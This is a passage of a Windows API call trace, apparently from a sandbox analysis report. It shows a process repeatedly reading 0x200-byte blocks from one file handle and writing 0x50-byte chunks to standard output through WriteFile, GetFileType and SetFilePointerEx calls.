(_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 
[0144.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] GetFileType (hFile=0x50) returned 0x1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.231] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.231] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] GetFileType (hFile=0x50) returned 0x1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 
[0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0144.232] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.232] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.233] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.233] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.233] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType 
(hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.234] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.234] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.234] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, 
lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] GetFileType (hFile=0x50) returned 0x1 [0144.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.235] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, 
lpOverlapped=0x0) returned 1 [0144.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.236] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.236] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.236] GetFileType (hFile=0x50) returned 0x1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.236] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: 
hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.237] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 
[0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, 
lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.239] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, 